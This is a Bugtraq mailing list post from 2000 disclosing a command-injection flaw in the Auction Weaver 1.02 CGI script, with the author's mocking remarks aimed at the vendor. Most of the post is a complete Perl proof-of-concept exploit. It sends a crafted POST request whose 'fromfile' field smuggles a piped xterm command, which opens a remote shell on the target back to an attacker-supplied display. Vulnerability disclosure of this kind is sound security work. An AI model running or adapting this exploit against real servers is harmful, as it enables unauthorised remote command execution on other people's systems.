Bugtraq mailing list archives
More problems with Auction Weaver & CGI Script Center.
From: teleh0r - <teleh0r () DOGLOVER COM>
Date: Wed, 30 Aug 2000 13:20:33 -0400
CGI Script Center recently upgraded Auction Weaver 1.0 to 1.2 due to a security issue found and reported by Meliksah Ozoral. Today, I decided to take a look at Auction Weaver just to check if the issue and possible other security problems were now fixed. I guessed they had taken a *close* look at their scripts, considering the problems reported lately - but I guessed wrong... I have only been able to check the below exploit on the shareware version, but I strongly believe that the PRO version is exploitable as well. Or perhaps only those who pays gets secure scripts? Maybe that would be a successful business policy? ;) CGI Script Center, _please_ contact me if you want help securing your scripts. Sincerely yours, teleh0r 8<---auctionweaver-exploit.pl------------------------------------ #!/usr/bin/perl -w ## Auction Weaver 1.02 / Only confirmed with LITE ## - Proof of Concept exploit - ## ## CGI Script Center have just released an update ## of Auction Weaver due to security reasons - I ## suggest that you spend some more time securing ## it, and the other scripts - It is really needed. ## ## This exploit will spawn a xterm from $target ## to $attacker. ## ## This exploit will not work on hosts running ## Auction Weaver on NT, due to the xterm call. ## ## CGI Script Center, please contact me if you need ## help with securing your scripts... ## ## teleh0r () doglover com / anno 2000 ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 3) { print("Usage: $0 <target> <attacker> <dpy>\n"); exit(1); } my($target,$attacker,$dpy,$length,$cgicode, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$attacker,$dpy) = @ARGV; if ($dpy !~ /\d/) { print("dpy must be a number, probably 0\n"); exit(1); } print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n"); print("Command: xterm -ut -display $attacker:$dpy\n\n"); system("xhost + $target"); $length = 138 + length($attacker.$dpy); $cgicode = "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir". "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut". "ton=BID"; $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; # The path to auctionweaver.pl may of course need to be changed. $sploit= "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $cgicode"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); exit(0) ----------------------------------------------------------------- ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup
Current thread:
- More problems with Auction Weaver & CGI Script Center. teleh0r - (Aug 30)